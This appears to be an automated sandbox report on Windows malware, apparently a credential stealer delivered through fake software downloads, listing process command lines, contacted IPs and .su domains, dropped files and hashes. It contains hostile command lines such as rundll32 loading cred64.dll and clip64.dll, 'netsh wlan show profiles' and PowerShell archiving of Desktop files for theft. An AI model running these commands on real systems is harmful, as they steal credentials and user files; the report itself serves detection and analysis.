"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2204 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4676 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5088 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 864 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1452

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5088 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5408 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:1

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3340 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4888 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5156 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5768 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Users\Admin\Downloads\ClassicShell.exe

"C:\Users\Admin\Downloads\ClassicShell.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5848 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\clip64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\clip64.dll, Main

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\904519900954_Desktop.zip' -CompressionLevel Optimal

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\clip64.dll, Main

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 908 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\904519900954_Desktop.zip' -CompressionLevel Optimal

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\904519900954_Desktop.zip' -CompressionLevel Optimal

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 900 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1496

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1672 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1156 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3372 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6036 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3760 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Users\Admin\Downloads\IconDance.exe

"C:\Users\Admin\Downloads\IconDance.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2384 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:2

C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE

"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\Desktop\DebugConvertFrom.xml"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3720 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5984 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3320 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5816 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Users\Admin\Downloads\DesktopPuzzle.exe

"C:\Users\Admin\Downloads\DesktopPuzzle.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 908 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1036

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 920 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 728

Network

Country Destination Domain Proto
IT 185.196.10.188:80 185.196.10.188 tcp
NL 89.23.103.42:80 tcp
NL 45.159.189.140:80 tcp
NL 89.23.103.42:80 tcp
US 172.67.141.128:80 moduls.su tcp
IT 185.196.10.188:80 185.196.10.188 tcp
NL 89.23.103.42:80 tcp
NL 45.159.189.140:80 tcp
US 172.67.128.47:80 modules.su tcp
IT 185.196.10.188:80 185.196.10.188 tcp
NL 89.23.103.42:80 tcp
NL 45.159.189.140:80 tcp
DE 140.82.121.5:443 api.github.com tcp
US 140.82.113.22:443 collector.github.com tcp
DE 140.82.121.5:443 api.github.com tcp
IT 185.196.10.188:80 185.196.10.188 tcp
NL 89.23.103.42:80 tcp
NL 45.159.189.140:80 tcp
NL 89.23.103.42:80 tcp
IT 185.196.10.188:80 185.196.10.188 tcp
NL 89.23.103.42:80 tcp
NL 45.159.189.140:80 tcp
DE 140.82.121.5:443 api.github.com tcp
NL 89.23.103.42:80 tcp
US 140.82.113.22:443 collector.github.com tcp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 192.178.49.3:443 beacons.gcp.gvt2.com udp
GB 142.250.178.10:443 content-autofill.googleapis.com udp
GB 142.250.178.10:443 content-autofill.googleapis.com tcp
US 192.178.49.3:443 beacons.gcp.gvt2.com tcp
US 140.82.113.22:443 collector.github.com tcp
US 140.82.113.22:443 collector.github.com tcp
US 140.82.113.22:443 collector.github.com tcp
NL 45.159.189.140:80 tcp
NL 89.23.103.42:80 tcp
NL 45.159.189.140:80 tcp
NL 45.159.189.140:80 tcp
NL 45.159.189.140:80 tcp
US 8.8.8.8:53 collector.github.com udp
US 140.82.113.21:443 collector.github.com tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
US 172.67.141.128:80 moduls.su tcp
US 8.8.8.8:53 api.github.com udp
DE 140.82.121.6:443 api.github.com tcp
US 172.67.128.47:80 modules.su tcp
US 140.82.113.21:443 collector.github.com tcp
DE 140.82.121.4:443 github.com tcp
DE 140.82.121.6:443 api.github.com tcp
NL 45.159.189.140:80 tcp
DE 140.82.121.4:443 github.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
DE 140.82.121.6:443 api.github.com tcp
US 140.82.113.21:443 collector.github.com tcp
US 8.8.8.8:53 moduls.su udp
US 188.114.97.2:80 moduls.su tcp
US 172.67.128.47:80 modules.su tcp
US 8.8.8.8:53 api.github.com udp
DE 140.82.121.6:443 api.github.com tcp
US 8.8.8.8:53 collector.github.com udp
US 140.82.113.22:443 collector.github.com tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
US 192.178.49.3:443 beacons.gcp.gvt2.com udp
US 192.178.49.3:443 beacons.gcp.gvt2.com tcp
DE 140.82.121.6:443 api.github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
DE 140.82.121.6:443 api.github.com tcp
DE 140.82.121.6:443 api.github.com tcp
US 140.82.113.22:443 collector.github.com tcp
IT 185.196.10.188:80 185.196.10.188 tcp
US 188.114.97.2:80 moduls.su tcp
US 8.8.8.8:53 modules.su udp
US 104.21.0.183:80 modules.su tcp
US 8.8.8.8:53 183.0.21.104.in-addr.arpa udp
NL 89.23.103.42:80 tcp
NL 45.159.189.140:80 tcp
NL 89.23.103.42:80 tcp
NL 45.159.189.140:80 tcp
US 188.114.97.2:80 moduls.su tcp
US 104.21.0.183:80 modules.su tcp

Files

\??\pipe\crashpad_1120_BWDCDCTUGNRSGQXT

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\4c7895ec-b006-4ba8-80e1-d5f0ab354c57.tmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe593cd0.TMP

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000033

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000032

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000030

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000031

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000034

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\286a1787eb6b73cf_0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fb9846e0ec264d61_0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\ade44207b4253689_0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\b55e27f8f44d80ba_0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\f66233e72c393c10_0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\bc9e1fd4409420f7_0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\3a3c8393d90e5773_0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000044

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5b9ab6.TMP

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

C:\Users\Admin\Downloads\NordVPN-10_11.zip

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

C:\Users\Admin\AppData\Roaming\services\Launhcer.dll

C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jgcq5byu.lib.ps1

C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll

C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest

C:\Users\Admin\AppData\Roaming\services\wget.exe

C:\Users\Admin\AppData\Roaming\services\wget.exe

C:\Users\Admin\AppData\Roaming\services\winrar.exe

C:\Users\Admin\AppData\Roaming\services\01plugins22977.rar

C:\Users\Admin\AppData\Roaming\services\plugin3944

C:\Users\Admin\AppData\Roaming\services\wget.exe

MD5 58e7c44614d277823a12fec5190ebc1e
SHA1 90f5feadcfe8620000de90c0d285090495f417cc
SHA256 93cd0de2453be0c7ba75f0d8b317fe149a6dea356ac87b21a5738cebe6309b3a
SHA512 6e4f71618f5bb5016c9130781bfcb029f1b8f1f3f66b36ac74084497a4f1f98b830ffd8087558789cfd607e2759b2f695f06bd2780df4f6a935a8552de041635

memory/5456-1255-0x0000000004AD0000-0x0000000004AE0000-memory.dmp

memory/2236-1256-0x0000000000E10000-0x0000000000F10000-memory.dmp

memory/2236-1257-0x00000000027B0000-0x000000000280A000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\.wget-hsts

MD5 528a2c4b02ff9126c40bebdc2b918072
SHA1 8aa86dfd2a589cd2349cc02a44bff57dbe74bc42
SHA256 7859ce07ab72d80a5ca7a90dfdbe3a6f411ca827b3060f7974af460232195c74
SHA512 00d29564496e554da2e0d8bd6266a208dce41a699c139e1d2fd93eb28881bfd6ff377847868162ff6b89dd1cca53c3c896e4acc5bab9050878b9f3942e06f24b

memory/2236-1259-0x0000000000400000-0x0000000000B21000-memory.dmp

memory/2236-1260-0x0000000003930000-0x0000000003D30000-memory.dmp

memory/2236-1261-0x0000000003930000-0x0000000003D30000-memory.dmp

memory/2236-1262-0x0000000003930000-0x0000000003D30000-memory.dmp

memory/2236-1263-0x00007FFBD73F0000-0x00007FFBD75E5000-memory.dmp

memory/2236-1264-0x0000000003930000-0x0000000003D30000-memory.dmp

memory/2236-1266-0x0000000076AE0000-0x0000000076CF5000-memory.dmp

memory/1040-1267-0x0000000000560000-0x0000000000569000-memory.dmp

memory/1040-1269-0x0000000002320000-0x0000000002720000-memory.dmp

memory/1040-1270-0x0000000003930000-0x0000000003D30000-memory.dmp

memory/1040-1272-0x00007FFBD73F0000-0x00007FFBD75E5000-memory.dmp

memory/1040-1271-0x0000000002320000-0x0000000002720000-memory.dmp

memory/1040-1274-0x0000000002320000-0x0000000002720000-memory.dmp

memory/1040-1275-0x0000000076AE0000-0x0000000076CF5000-memory.dmp

memory/1040-1276-0x0000000002320000-0x0000000002720000-memory.dmp

memory/2236-1277-0x0000000000400000-0x0000000000B21000-memory.dmp

memory/2236-1278-0x0000000003930000-0x0000000003D30000-memory.dmp

memory/2844-1279-0x0000000000400000-0x00000000008F2000-memory.dmp

memory/2844-1282-0x0000000000400000-0x00000000008F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

MD5 19788ec08e4337184f2c228fb8841e0d
SHA1 61228ed0e7ba1fb56840975afa39634581d5e65b
SHA256 da38e4b11a421d6a3e1733643120b5729549e04b21d67850cb6f2cb2d8057ed4
SHA512 d28edaa176f8866b2a2d9d212f7f9cbf94a7b92290303dc5f0911ae6f486be1f54e2cfb04879102b62e5425d8fedbd0255d566ebd275ce8bf1021009bf21e4bb

C:\Users\Admin\AppData\Roaming\services\02plugins20991.rar

MD5 51ecc8155fddc0ca74a37b2ee442898c
SHA1 2d83a01c90efa734f1c1632fa2b2f4f15c2d5ccb
SHA256 e4a21e9e2fdadaeff6d283971cbe67dd4433f0b253ffcb7cabb49b620175fa5c
SHA512 b55654eb35f02b26313094a259110ffa77554d498e051a3ab3beafcfad610661c0fe46ea193be8eea6bb8024885b67dc29d5af5b7320c7f9668ddc6ad7ba5a92

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000021

MD5 8b2813296f6e3577e9ac2eb518ac437e
SHA1 6c8066353b4d463018aa1e4e9bb9bf2e9a7d9a86
SHA256 befb3b0471067ac66b93fcdba75c11d743f70a02bb9f5eef7501fa874686319d
SHA512 a1ed4d23dfbe981bf749c2008ab55a3d76e8f41801a09475e7e0109600f288aa20036273940e8ba70a172dec57eec56fe7c567cb941ba71edae080f2fdcc1e0c

C:\Users\Admin\AppData\Roaming\services\2plugin2958

MD5 98e519ed61425da19b55fef3a92b3809
SHA1 4b4f299d73fafbeb8762b322cb7f82cd45b6ebba
SHA256 d94938cb9f949897b99f4b3d9186c1918616655331731b67abd084821eba0fcd
SHA512 6030e8afc89cc57ede32cb3f83b15f08503e82fbaa171ae79915be90f70d1460e978b67fc2c77a8a36b8858c7c9dcda8d5d7980a6009febc1183ba871b76ba81

C:\Users\Admin\AppData\Roaming\services\2plugin2958

MD5 59fd1c8bfb52c2f023b3849b606206ea
SHA1 a46f2c88e954e59a3e8ba252cd52baf6fbed794f
SHA256 dfab9c27dc67771fee8ec2c96b2ecdc7069906a148e95c4dd7207056c9c59869
SHA512 cc82de08aacb1cc861f64503574e7ca81e643a5711a45beb90d508f7c3317d880e7d3f358dcc9306a76a2e0677564f21e8e384f4573b203c7ea03c07045db78d

C:\Users\Admin\AppData\Roaming\services\wget.exe

MD5 5a88b2a2ec1e02fd82e52f056a459bfe
SHA1 fab97fe5613288af9d28e3b5e06a3ebbfcf5f3ca
SHA256 ccdc8b3ce63fdfbcf835099c10928169193b5960ae3b13684f90ffc62bfae519
SHA512 aca1ea01f6c9352b824862d5f049c312f0a006945549aad0eb0490d95953e6c2ea24fca7f28039d4dac2d21b2b4c2fa94c3c64ec4c2d0f6ccddd88cb1f85ae96

C:\Users\Admin\AppData\Roaming\services\.wget-hsts

MD5 4bfd3a97caed0ba29172e7b09c21d0ca
SHA1 19143db74521b1f02efa81d49e16015e76e08614
SHA256 4ff2b32e0a40a23b789edd4bb75ae259105575296f851050094b12275d4853ae
SHA512 3bfd5de228e62e7f13ffca0aec7eabb665d3b63b928f315caa7bd08bdfb70122875b09128c017287005393d007cf11573589b9562deed4966e2c6236101a296a

memory/5052-1449-0x00007FFBD75F0000-0x00007FFBD75F2000-memory.dmp

memory/5052-1448-0x00007FF765660000-0x00007FF76650E000-memory.dmp

memory/5052-1450-0x00007FFBD7600000-0x00007FFBD7602000-memory.dmp

memory/5052-1451-0x00007FF765660000-0x00007FF76650E000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 1e5d9d0e2788756bb8fe7514b8d622dd
SHA1 289c7c36edc8453a937e45cbf907f4d357a70c98
SHA256 b2329c5b40b605230a2a599cf055abd151b36b7a5362a11136bc830bc8e58b50
SHA512 03defb83c391d599ce6553973ba68c6f1e2c063027767def05e2e2030844a6d7ac4be20b46db7d6abccf84feea64d9b3f592785bab315131d4809863fb51b8e6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 2ebf3d79655f15a479b3f1b6c2319677
SHA1 1c195798169a3ae7367a2b1df9c2b7a3dfef5ac0
SHA256 4f6006bf73ffe4f92c7f411e70757439a3397450739b4aa04cc4d4eb7c6b97eb
SHA512 828ef6f4ca4bdeee6d905e90826134718ff4fa9a492035e4ec6cd5f879959264e049cbc8db5e7ab18d4f3b402bea19ff320579dea44ff42e328ce708af740e5d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 51e973384ba243111355290121fd6f5f
SHA1 24c60a0859db999782d876241113ab432dff8448
SHA256 5155822ba563b7ed393356e930e2627b222f84cf4612ae5717968d42d7d1cf0d
